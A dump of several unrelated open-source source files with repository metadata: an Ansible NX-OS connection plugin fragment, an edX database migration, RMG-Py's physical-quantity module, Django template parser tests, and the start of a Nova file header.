self._task.args['username'] = self._play_context.remote_user
elif self._play_context.connection == 'local':
self._task.args['username'] = self._play_context.connection_user
if self._task.action == 'nxos_install_os':
connection = self._connection
if connection.get_option('persistent_command_timeout') < 600 or connection.get_option('persistent_connect_timeout') < 600:
msg = 'PERSISTENT_COMMAND_TIMEOUT and PERSISTENT_CONNECT_TIMEOUT'
msg += ' must be set to 600 seconds or higher when using nxos_install_os module'
return {'failed': True, 'msg': msg}
if self._play_context.connection in ('network_cli', 'httpapi'):
provider = self._task.args.get('provider', {})
if any(provider.values()):
display.warning('provider is unnecessary when using %s and will be ignored' % self._play_context.connection)
del self._task.args['provider']
if self._task.args.get('transport'):
display.warning('transport is unnecessary when using %s and will be ignored' % self._play_context.connection)
del self._task.args['transport']
elif self._play_context.connection == 'local':
provider = load_provider(nxos_provider_spec, self._task.args)
transport = provider['transport'] or 'cli'
display.vvvv('connection transport is %s' % transport, self._play_context.remote_addr)
if transport == 'cli':
pc = copy.deepcopy(self._play_context)
pc.connection = 'network_cli'
pc.network_os = 'nxos'
pc.remote_addr = provider['host'] or self._play_context.remote_addr
pc.port = int(provider['port'] or self._play_context.port or 22)
pc.remote_user = provider['username'] or self._play_context.connection_user
pc.password = provider['password'] or self._play_context.password
pc.private_key_file = provider['ssh_keyfile'] or self._play_context.private_key_file
pc.become = provider['authorize'] or False
if pc.become:
pc.become_method = 'enable'
pc.become_pass = provider['auth_pass']
display.vvv('using connection plugin %s (was local)' % pc.connection, pc.remote_addr)
connection = self._shared_loader_obj.connection_loader.get('persistent', pc, sys.stdin)
command_timeout = int(provider['timeout']) if provider['timeout'] else connection.get_option('persistent_command_timeout')
connection.set_options(direct={'persistent_command_timeout': command_timeout})
socket_path = connection.run()
display.vvvv('socket_path: %s' % socket_path, pc.remote_addr)
if not socket_path:
return {'failed': True,
'msg': 'unable to open shell. Please see: ' +
'https://docs.ansible.com/ansible/network_debug_troubleshooting.html#unable-to-open-shell'}
task_vars['ansible_socket'] = socket_path
else:
self._task.args['provider'] = ActionModule.nxapi_implementation(provider, self._play_context)
else:
return {'failed': True, 'msg': 'Connection type %s is not valid for this module' % self._play_context.connection}
if (self._play_context.connection == 'local' and transport == 'cli') or self._play_context.connection == 'network_cli':
# make sure we are in the right cli context which should be
# enable mode and not config module
if socket_path is None:
socket_path = self._connection.socket_path
conn = Connection(socket_path)
# Match prompts ending in )# except those with (maint-mode)#
config_prompt = re.compile(r'^.*\((?!maint-mode).*\)#$')
out = conn.get_prompt()
while config_prompt.match(to_text(out, errors='surrogate_then_replace').strip()):
display.vvvv('wrong context, sending exit to device', self._play_context.remote_addr)
conn.send_command('exit')
out = conn.get_prompt()
result = super(ActionModule, self).run(task_vars=task_vars)
return result
@staticmethod
def nxapi_implementation(provider, play_context):
provider['transport'] = 'nxapi'
if provider.get('host') is None:
provider['host'] = play_context.remote_addr
if provider.get('port') is None:
if provider.get('use_ssl'):
provider['port'] = 443
else:
provider['port'] = 80
if provider.get('timeout') is None:
provider['timeout'] = C.PERSISTENT_COMMAND_TIMEOUT
if provider.get('username') is None:
provider['username'] = play_context.connection_user
if provider.get('password') is None:
provider['password'] = play_context.password
if provider.get('use_ssl') is None:
provider['use_ssl'] = False
if provider.get('validate_certs') is None:
provider['validate_certs'] = True
return provider
| gpl-3.0 |
ubc/edx-platform | common/djangoapps/course_action_state/migrations/0002_add_rerun_display_name.py | 129 | 5409 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'CourseRerunState.display_name'
db.add_column('course_action_state_coursererunstate', 'display_name',
self.gf('django.db.models.fields.CharField')(default='', max_length=255, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'CourseRerunState.display_name'
db.delete_column('course_action_state_coursererunstate', 'display_name')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'course_action_state.coursererunstate': {
'Meta': {'unique_together': "(('course_key', 'action'),)", 'object_name': 'CourseRerunState'},
'action': ('django.db.models.fields.CharField', [], {'max_length': '100', 'db_index': 'True'}),
'course_key': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_by_user+'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['auth.User']"}),
'display_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'should_display': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'source_course_key': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'updated_time': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'updated_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'updated_by_user+'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': "orm['auth.User']"})
}
}
complete_apps = ['course_action_state']
| agpl-3.0 |
faribas/RMG-Py | rmgpy/quantity.py | 4 | 28300 | #!/usr/bin/env python
# encoding: utf-8
################################################################################
#
# RMG - Reaction Mechanism Generator
#
# Copyright (c) 2009-2011 by the RMG Team ([email protected])
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the 'Software'),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
################################################################################
"""
This module contains classes and methods for working with physical quantities,
particularly the :class:`Quantity` class for representing physical quantities.
"""
import numpy
import quantities as pq
import rmgpy.constants as constants
################################################################################
# Explicitly set the default units to SI
pq.set_default_units('si')
# These units are not defined by the quantities package, but occur frequently
# in data handled by RMG, so we define them manually
pq.UnitQuantity('kilocalories', pq.cal*1e3, symbol='kcal')
pq.UnitQuantity('kilojoules', pq.J*1e3, symbol='kJ')
pq.UnitQuantity('kilomoles', pq.mol*1e3, symbol='kmol')
pq.UnitQuantity('molecule', pq.mol/6.02214179e23, symbol='molecule')
pq.UnitQuantity('molecules', pq.mol/6.02214179e23, symbol='molecules')
pq.UnitQuantity('debye', 1.0/(constants.c*1e21)*pq.C*pq.m, symbol='De')
################################################################################
class QuantityError(Exception):
"""
An exception to be raised when an error occurs while working with physical
quantities in RMG. Pass a string describing the circumstances of the
exceptional behavior.
"""
pass
################################################################################
class Units(object):
"""
The :class:`Units` class provides a representation of the units of a
physical quantity. The attributes are:
=================== ========================================================
Attribute Description
=================== ========================================================
`units` A string representation of the units
=================== ========================================================
Functions that return the conversion factors to and from SI units are
provided.
"""
# A dict of conversion factors (to SI) for each of the frequent units
# Here we also define that cm^-1 is not to be converted to m^-1 (or Hz, J, K, etc.)
conversionFactors = {'cm^-1': 1.0}
def __init__(self, units=''):
self.units = units
def getConversionFactorToSI(self):
"""
Return the conversion factor for converting a quantity in a given set
of`units` to the SI equivalent units.
"""
try:
# Process several common units manually for speed
factor = Units.conversionFactors[self.units]
except KeyError:
# Fall back to (slow!) quantities package for less common units
factor = float(pq.Quantity(1.0, self.units).simplified)
# Cache the conversion factor so we don't ever need to use
# quantities to compute it again
Units.conversionFactors[self.units] = factor
return factor
def getConversionFactorFromSI(self):
"""
Return the conversion factor for converting a quantity to a given set
of `units` from the SI equivalent units.
"""
return 1.0 / self.getConversionFactorToSI()
################################################################################
class ScalarQuantity(Units):
"""
The :class:`ScalarQuantity` class provides a representation of a scalar
physical quantity, with optional units and uncertainty information. The
attributes are:
=================== ========================================================
Attribute Description
=================== ========================================================
`value` The numeric value of the quantity in the given units
`units` The units the value was specified in
`uncertainty` The numeric uncertainty in the value
`uncertaintyType` The type of uncertainty: ``'+|-'`` for additive, ``'*|/'`` for multiplicative
`value_si` The numeric value of the quantity in the corresponding SI units
=================== ========================================================
It is often more convenient to perform computations using SI units instead
of the given units of the quantity. For this reason, the SI equivalent of
the `value` attribute can be directly accessed using the `value_si`
attribute. This value is cached on the :class:`ScalarQuantity` object for
speed.
"""
def __init__(self, value, units='', uncertainty=None, uncertaintyType='+|-'):
Units.__init__(self, units)
self.value = value
self.uncertaintyType = uncertaintyType
self.uncertainty = float(uncertainty) if uncertainty is not None else 0.0
def __reduce__(self):
"""
Return a tuple of information used to pickle the scalar quantity.
"""
return (ScalarQuantity, (self.value, self.units, self.uncertainty, self.uncertaintyType))
def __str__(self):
"""
Return a string representation of the scalar quantity.
"""
result = '{0:g}'.format(self.value)
if self.uncertainty != 0.0:
result += ' {0} {1:g}'.format(self.uncertaintyType, self.uncertainty)
if self.units != '':
result += ' {0}'.format(self.units)
return result
def __repr__(self):
"""
Return a string representation that can be used to reconstruct the
scalar quantity.
"""
if self.units == '' and self.uncertainty == 0.0:
return '{0:g}'.format(self.value)
else:
result = '({0:g},{1!r}'.format(self.value, self.units)
if self.uncertainty != 0.0:
result += ',{0!r},{1:g}'.format(self.uncertaintyType, self.uncertainty)
result += ')'
return result
def copy(self):
"""
Return a copy of the quantity.
"""
return ScalarQuantity(self.value, self.units, self.uncertainty, self.uncertaintyType)
def getValue(self):
"""
The numeric value of the quantity, in the given units
"""
return self.value_si * self.getConversionFactorFromSI()
def setValue(self, v):
self.value_si = float(v) * self.getConversionFactorToSI()
value = property(getValue, setValue)
def getUncertainty(self):
"""
The numeric value of the uncertainty, in the given units if additive, or no units if multiplicative.
"""
if self.isUncertaintyAdditive():
return self.uncertainty_si * self.getConversionFactorFromSI()
else:
return self.uncertainty_si
def setUncertainty(self, v):
if self.isUncertaintyAdditive():
self.uncertainty_si = float(v) * self.getConversionFactorToSI()
else:
self.uncertainty_si = float(v)
uncertainty = property(getUncertainty, setUncertainty)
def getUncertaintyType(self):
"""
The type of uncertainty: ``'+|-'`` for additive, ``'*|/'`` for multiplicative
"""
return self._uncertaintyType
def setUncertaintyType(self, v):
"""
Check the uncertainty type is valid, then set it, and set the uncertainty to -1.
If you set the uncertainty then change the type, we have no idea what to do with
the units. This ensures you set the type first.
"""
if v not in ['+|-','*|/']:
raise QuantityError("Invalid uncertainty type")
self._uncertaintyType = v
self.uncertainty_si = -1
uncertaintyType = property(getUncertaintyType, setUncertaintyType)
def equals(self, quantity):
"""
Return ``True`` if the everything in a quantity object matches
the parameters in this object. If there are lists of values or uncertainties,
each item in the list must be matching and in the same order.
Otherwise, return ``False``
(Originally intended to return warning if units capitalization was
different, however, Quantity object only parses units matching in case, so
this will not be a problem.)
"""
def approx_equal(x, y, atol = .01):
"""
Returns true if two float/double values are approximately equal
within a relative error of 1% or under a user specific absolute tolerance.
"""
return abs(x-y) <= 1e-2*abs(x) or abs(x-y) <= 1e-2*abs(y) or abs(x-y) <= atol
if isinstance(quantity, ScalarQuantity):
if (self.uncertaintyType == quantity.uncertaintyType and
approx_equal(self.uncertainty * self.getConversionFactorToSI(), quantity.uncertainty * quantity.getConversionFactorToSI()) and
self.units == quantity.units):
if self.units == "kcal/mol":
# set absolute tolerance to .01 kcal/mol = 42 J/mol
atol = 42
else:
# for other units, set it to .01
atol = .01
if not approx_equal(self.value_si, quantity.value_si, atol):
return False
return True
return False
def isUncertaintyAdditive(self):
"""
Return ``True`` if the uncertainty is specified in additive format
and ``False`` otherwise.
"""
return self._uncertaintyType == '+|-'
def isUncertaintyMultiplicative(self):
"""
Return ``True`` if the uncertainty is specified in multiplicative
format and ``False`` otherwise.
"""
return self._uncertaintyType == '*|/'
################################################################################
class ArrayQuantity(Units):
"""
The :class:`ScalarQuantity` class provides a representation of an array of
physical quantity values, with optional units and uncertainty information.
The attributes are:
=================== ========================================================
Attribute Description
=================== ========================================================
`value` The numeric value of the quantity in the given units
`units` The units the value was specified in
`uncertainty` The numeric uncertainty in the value
`uncertaintyType` The type of uncertainty: ``'+|-'`` for additive, ``'*|/'`` for multiplicative
`value_si` The numeric value of the quantity in the corresponding SI units
=================== ========================================================
It is often more convenient to perform computations using SI units instead
of the given units of the quantity. For this reason, the SI equivalent of
the `value` attribute can be directly accessed using the `value_si`
attribute. This value is cached on the :class:`ArrayQuantity` object for
speed.
"""
def __init__(self, value, units='', uncertainty=None, uncertaintyType='+|-'):
Units.__init__(self, units)
self.value = value
self.uncertaintyType = uncertaintyType
if uncertainty is None:
self.uncertainty = numpy.zeros_like(self.value)
elif isinstance(uncertainty, (int,float)):
self.uncertainty = numpy.ones_like(self.value) * uncertainty
else:
uncertainty = numpy.array(uncertainty)
if uncertainty.ndim != self.value.ndim:
raise QuantityError('The given uncertainty has {0:d} dimensions, while the given value has {1:d} dimensions.'.format(uncertainty.ndim, self.value.ndim))
for i in range(self.value.ndim):
if self.value.shape[i] != uncertainty.shape[i]:
raise QuantityError('Dimension {0:d} has {1:d} elements for the given value, but {2:d} elements for the given uncertainty.'.format(i, self.value.shape[i], uncertainty.shape[i]))
else:
self.uncertainty = uncertainty
def __reduce__(self):
"""
Return a tuple of information used to pickle the array quantity.
"""
return (ArrayQuantity, (self.value, self.units, self.uncertainty, self.uncertaintyType))
def __str__(self):
"""
Return a string representation of the array quantity.
"""
if self.value.ndim == 1:
value = '[{0}]'.format(','.join(['{0:g}'.format(float(v)) for v in self.value]))
elif self.value.ndim == 2:
value = []
for i in range(self.value.shape[0]):
value.append('[{0}]'.format(','.join(['{0:g}'.format(float(self.value[i,j])) for j in range(self.value.shape[1])])))
value = '[{0}]'.format(','.join(value))
if self.uncertainty.ndim == 1:
uncertainty = '[{0}]'.format(','.join(['{0:g}'.format(float(v)) for v in self.uncertainty]))
elif self.uncertainty.ndim == 2:
uncertainty = []
for i in range(self.uncertainty.shape[0]):
uncertainty.append('[{0}]'.format(','.join(['{0:g}'.format(float(self.uncertainty[i,j])) for j in range(self.uncertainty.shape[1])])))
uncertainty = '[{0}]'.format(','.join(uncertainty))
result = '{0}'.format(value)
if any(self.uncertainty != 0.0):
result += ' {0} {1}'.format(self.uncertaintyType, uncertainty)
if self.units != '':
result += ' {0}'.format(self.units)
return result
def __repr__(self):
"""
Return a string representation that can be used to reconstruct the
array quantity.
"""
if self.value.ndim == 1:
value = '[{0}]'.format(','.join(['{0:g}'.format(float(v)) for v in self.value]))
elif self.value.ndim == 2:
value = []
for i in range(self.value.shape[0]):
value.append('[{0}]'.format(','.join(['{0:g}'.format(float(self.value[i,j])) for j in range(self.value.shape[1])])))
value = '[{0}]'.format(','.join(value))
if self.uncertainty.ndim == 1:
uncertainty = '[{0}]'.format(','.join(['{0:g}'.format(float(v)) for v in self.uncertainty]))
elif self.uncertainty.ndim == 2:
uncertainty = []
for i in range(self.uncertainty.shape[0]):
uncertainty.append('[{0}]'.format(','.join(['{0:g}'.format(float(self.uncertainty[i,j])) for j in range(self.uncertainty.shape[1])])))
uncertainty = '[{0}]'.format(','.join(uncertainty))
if self.units == '' and not numpy.any(self.uncertainty != 0.0):
return '{0}'.format(value)
else:
result = '({0},{1!r}'.format(value, self.units)
if numpy.any(self.uncertainty != 0.0):
result += ',{0!r},{1}'.format(self.uncertaintyType, uncertainty)
result += ')'
return result
def copy(self):
"""
Return a copy of the quantity.
"""
return ArrayQuantity(self.value.copy(), self.units, self.uncertainty.copy(), self.uncertaintyType)
def getValue(self):
return self.value_si * self.getConversionFactorFromSI()
def setValue(self, v):
self.value_si = numpy.array(v) * self.getConversionFactorToSI()
value = property(getValue, setValue)
def equals(self, quantity):
"""
Return ``True`` if the everything in a quantity object matches
the parameters in this object. If there are lists of values or uncertainties,
each item in the list must be matching and in the same order.
Otherwise, return ``False``
(Originally intended to return warning if units capitalization was
different, however, Quantity object only parses units matching in case, so
this will not be a problem.)
"""
def approx_equal(x, y, atol = .01):
"""
Returns true if two float/double values are approximately equal
within a relative error of 1% or under a user specific absolute tolerance.
"""
return abs(x-y) <= 1e-2*abs(x) or abs(x-y) <= 1e-2*abs(y) or abs(x-y) <= atol
if isinstance(quantity, ArrayQuantity):
if (self.uncertaintyType == quantity.uncertaintyType and self.units == quantity.units):
if self.units == "kcal/mol":
# set absolute tolerance to .01 kcal/mol = 42 J/mol
atol = 42
else:
# for other units, set it to .01
atol = .01
if self.value.ndim != quantity.value.ndim:
return False
for i in range(self.value.ndim):
if self.value.shape[i] != quantity.value.shape[i]:
return False
for v1, v2 in zip(self.value.flat, quantity.value.flat):
if not approx_equal(v1, v2, atol):
return False
if self.uncertainty.ndim != quantity.uncertainty.ndim:
return False
for i in range(self.uncertainty.ndim):
if self.uncertainty.shape[i] != quantity.uncertainty.shape[i]:
return False
for v1, v2 in zip(self.uncertainty.flat, quantity.uncertainty.flat):
if not approx_equal(v1, v2, atol):
return False
return True
return False
def isUncertaintyAdditive(self):
"""
Return ``True`` if the uncertainty is specified in additive format
and ``False`` otherwise.
"""
return self.uncertaintyType == '+|-'
def isUncertaintyMultiplicative(self):
"""
Return ``True`` if the uncertainty is specified in multiplicative
format and ``False`` otherwise.
"""
return self.uncertaintyType == '*|/'
################################################################################
def Quantity(*args, **kwargs):
"""
Create a :class:`ScalarQuantity` or :class:`ArrayQuantity` object for a
given physical quantity. The physical quantity can be specified in several
ways:
* A scalar-like or array-like value (for a dimensionless quantity)
* An array of arguments (including keyword arguments) giving some or all of
the `value`, `units`, `uncertainty`, and/or `uncertaintyType`.
* A tuple of the form ``(value,)``, ``(value,units)``,
``(value,units,uncertainty)``, or
``(value,units,uncertaintyType,uncertainty)``
* An existing :class:`ScalarQuantity` or :class:`ArrayQuantity` object, for
which a copy is made
"""
# Initialize attributes
value = None
units = ''
uncertaintyType = '+|-'
uncertainty = None
if len(args) == 1 and len(kwargs) == 0 and args[0] is None:
return None
# Unpack args if necessary
if isinstance(args, tuple) and len(args) == 1 and isinstance(args[0], tuple):
args = args[0]
# Process args
Nargs = len(args)
if Nargs == 1 and isinstance(args[0], (ScalarQuantity,ArrayQuantity)):
# We were given another quantity object, so make a (shallow) copy of it
other = args[0]
value = other.value
units = other.units
uncertaintyType = other.uncertaintyType
uncertainty = other.uncertainty
elif Nargs == 1:
# If one parameter is given, it should be a single value
value, = args
elif Nargs == 2:
# If two parameters are given, it should be a value and units
value, units = args
elif Nargs == 3:
# If three parameters are given, it should be a value, units and uncertainty
value, units, uncertainty = args
elif Nargs == 4:
# If four parameters are given, it should be a value, units, uncertainty type, and uncertainty
value, units, uncertaintyType, uncertainty = args
elif Nargs != 0:
raise QuantityError('Invalid parameters {0!r} passed to ArrayQuantity.__init__() method.'.format(args))
# Process kwargs
for k, v in kwargs.items():
if k == 'value':
if len(args) >= 1:
raise QuantityError('Multiple values for argument {0} passed to ArrayQuantity.__init__() method.'.format(k))
else:
value = v
elif k == 'units':
if len(args) >= 2:
raise QuantityError('Multiple values for argument {0} passed to ArrayQuantity.__init__() method.'.format(k))
else:
units = v
elif k == 'uncertainty':
if len(args) >= 3:
raise QuantityError('Multiple values for argument {0} passed to ArrayQuantity.__init__() method.'.format(k))
else:
uncertainty = v
elif k == 'uncertaintyType':
if len(args) >= 4:
raise QuantityError('Multiple values for argument {0} passed to ArrayQuantity.__init__() method.'.format(k))
else:
uncertaintyType = v
else:
raise QuantityError('Invalid keyword argument {0} passed to ArrayQuantity.__init__() method.'.format(k))
# Process units and uncertainty type parameters
if uncertaintyType not in ['+|-', '*|/']:
raise QuantityError('Unexpected uncertainty type "{0}"; valid values are "+|-" and "*|/".'.format(uncertaintyType))
if isinstance(value, (list,tuple,numpy.ndarray)):
return ArrayQuantity(value, units, uncertainty, uncertaintyType)
try:
value = float(value)
except TypeError:
return ArrayQuantity(value, units, uncertainty, uncertaintyType)
uncertainty = 0.0 if uncertainty is None else float(uncertainty)
return ScalarQuantity(value, units, uncertainty, uncertaintyType)
################################################################################
class UnitType:
"""
The :class:`UnitType` class represents a factory for producing
:class:`ScalarQuantity` or :class:`ArrayQuantity` objects of a given unit
type, e.g. time, volume, etc.
"""
def __init__(self, units, commonUnits=None, extraDimensionality=None):
self.units = units
self.dimensionality = pq.Quantity(1.0, units).simplified.dimensionality
self.commonUnits = commonUnits or []
self.extraDimensionality = {}
if extraDimensionality:
for unit, factor in extraDimensionality.items():
self.extraDimensionality[pq.Quantity(1.0, unit).simplified.dimensionality] = factor
def __call__(self, *args, **kwargs):
# Make a ScalarQuantity or ArrayQuantity object out of the given parameter
quantity = Quantity(*args, **kwargs)
if quantity is None:
return quantity
units = quantity.units
# If the units are in the common units, then we can do the conversion
# very quickly and avoid the slow calls to the quantities package
if units == self.units or units in self.commonUnits:
return quantity
# Check that the units are consistent with this unit type
# This uses the quantities package (slow!)
units = pq.Quantity(1.0, units)
dimensionality = units.simplified.dimensionality
if dimensionality == self.dimensionality:
pass
elif dimensionality in self.extraDimensionality:
quantity.value_si *= self.extraDimensionality[dimensionality]
quantity.units = self.units
else:
raise QuantityError('Invalid units {0!r}.'.format(quantity.units))
# Return the Quantity or ArrayQuantity object object
return quantity
Acceleration = UnitType('m/s^2')
Area = UnitType('m^2')
Concentration = UnitType('mol/m^3')
Dimensionless = UnitType('')
DipoleMoment = UnitType('C*m', extraDimensionality={
'De': 1.0 / (1.0e21 * constants.c),
})
Energy = Enthalpy = FreeEnergy = UnitType('J/mol', commonUnits=['kJ/mol', 'cal/mol', 'kcal/mol'])
Entropy = HeatCapacity = UnitType('J/(mol*K)', commonUnits=['kJ/(mol*K)', 'cal/(mol*K)', 'kcal/(mol*K)'])
Flux = UnitType('mol/(m^2*s)')
Frequency = UnitType('cm^-1', extraDimensionality={
's^-1': 1.0 / (constants.c * 100.),
'Hz': 1.0 / (constants.c * 100.),
'J': 1.0 / (constants.h * constants.c * 100.),
'K': constants.kB / (constants.h * constants.c * 100.),
})
Force = UnitType('N')
Inertia = UnitType('kg*m^2')
Length = UnitType('m')
Mass = UnitType('amu', extraDimensionality={'kg/mol': 1000.*constants.amu})
Momentum = UnitType('kg*m/s^2')
Power = UnitType('W')
Pressure = UnitType('Pa', commonUnits=['bar', 'atm', 'torr', 'psi', 'mbar'])
Temperature = UnitType('K', commonUnits=['degC', 'degF', 'degR'])
Time = UnitType('s')
Velocity = UnitType('m/s')
Volume = UnitType('m^3')
# Polarizability = UnitType('C*m^2*V^-1')
"""
What's called Polarizability in the transport properties is in fact a polarizability volume,
which is related by $4*\pi*\epsilon_0$ where $\epsilon_0$ is the permittivity of free space.
Rather than mess around with conversions, I suggest we just use "Volume" as the units for
what we call 'polarizability'. Chemkin expects it in Angstrom^3. We'll store it in m^3.
"""
# RateCoefficient is handled as a special case since it can take various
# units depending on the reaction order
RATECOEFFICIENT_CONVERSION_FACTORS = {
(1.0/pq.s).dimensionality: 1.0,
(pq.m**3/pq.s).dimensionality: 1.0,
(pq.m**6/pq.s).dimensionality: 1.0,
(pq.m**9/pq.s).dimensionality: 1.0,
(pq.m**3/(pq.mol*pq.s)).dimensionality: 1.0,
(pq.m**6/(pq.mol**2*pq.s)).dimensionality: 1.0,
(pq.m**9/(pq.mol**3*pq.s)).dimensionality: 1.0,
}
RATECOEFFICIENT_COMMON_UNITS = ['s^-1', 'm^3/(mol*s)', 'cm^3/(mol*s)', 'm^3/(molecule*s)', 'cm^3/(molecule*s)']
def RateCoefficient(*args, **kwargs):
# Make a ScalarQuantity or ArrayQuantity object out of the given parameter
quantity = Quantity(*args, **kwargs)
if quantity is None:
return quantity
units = quantity.units
# If the units are in the common units, then we can do the conversion
# very quickly and avoid the slow calls to the quantities package
if units in RATECOEFFICIENT_COMMON_UNITS:
return quantity
dimensionality = pq.Quantity(1.0, quantity.units).simplified.dimensionality
try:
factor = RATECOEFFICIENT_CONVERSION_FACTORS[dimensionality]
quantity.value_si *= factor
except KeyError:
raise QuantityError('Invalid units {0!r}.'.format(quantity.units))
# Return the Quantity or ArrayQuantity object object
return quantity
| mit |
SnappleCap/oh-mainline | vendor/packages/Django/tests/regressiontests/templates/parser.py | 58 | 3218 | """
Testing some internals of the template processing. These are *not* examples to be copied in user code.
"""
from __future__ import unicode_literals
from django.template import (TokenParser, FilterExpression, Parser, Variable,
TemplateSyntaxError)
from django.utils.unittest import TestCase
class ParserTests(TestCase):
def test_token_parsing(self):
# Tests for TokenParser behavior in the face of quoted strings with
# spaces.
p = TokenParser("tag thevar|filter sometag")
self.assertEqual(p.tagname, "tag")
self.assertEqual(p.value(), "thevar|filter")
self.assertTrue(p.more())
self.assertEqual(p.tag(), "sometag")
self.assertFalse(p.more())
p = TokenParser('tag "a value"|filter sometag')
self.assertEqual(p.tagname, "tag")
self.assertEqual(p.value(), '"a value"|filter')
self.assertTrue(p.more())
self.assertEqual(p.tag(), "sometag")
self.assertFalse(p.more())
p = TokenParser("tag 'a value'|filter sometag")
self.assertEqual(p.tagname, "tag")
self.assertEqual(p.value(), "'a value'|filter")
self.assertTrue(p.more())
self.assertEqual(p.tag(), "sometag")
self.assertFalse(p.more())
def test_filter_parsing(self):
c = {"article": {"section": "News"}}
p = Parser("")
def fe_test(s, val):
self.assertEqual(FilterExpression(s, p).resolve(c), val)
fe_test("article.section", "News")
fe_test("article.section|upper", "NEWS")
fe_test('"News"', "News")
fe_test("'News'", "News")
fe_test(r'"Some \"Good\" News"', 'Some "Good" News')
fe_test(r'"Some \"Good\" News"', 'Some "Good" News')
fe_test(r"'Some \'Bad\' News'", "Some 'Bad' News")
fe = FilterExpression(r'"Some \"Good\" News"', p)
self.assertEqual(fe.filters, [])
self.assertEqual(fe.var, 'Some "Good" News')
# Filtered variables should reject access of attributes beginning with
# underscores.
self.assertRaises(TemplateSyntaxError,
FilterExpression, "article._hidden|upper", p
)
def test_variable_parsing(self):
c = {"article": {"section": "News"}}
self.assertEqual(Variable("article.section").resolve(c), "News")
self.assertEqual(Variable('"News"').resolve(c), "News")
self.assertEqual(Variable("'News'").resolve(c), "News")
# Translated strings are handled correctly.
self.assertEqual(Variable("_(article.section)").resolve(c), "News")
self.assertEqual(Variable('_("Good News")').resolve(c), "Good News")
self.assertEqual(Variable("_('Better News')").resolve(c), "Better News")
# Escaped quotes work correctly as well.
self.assertEqual(
Variable(r'"Some \"Good\" News"').resolve(c), 'Some "Good" News'
)
self.assertEqual(
Variable(r"'Some \'Better\' News'").resolve(c), "Some 'Better' News"
)
# Variables should reject access of attributes beginning with
# underscores.
self.assertRaises(TemplateSyntaxError,
Variable, "article._hidden"
)
| agpl-3.0 |
paulmathews/nova | nova/api/openstack/compute/contrib/server_diagnostics.py | 19 | 2505 | # Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
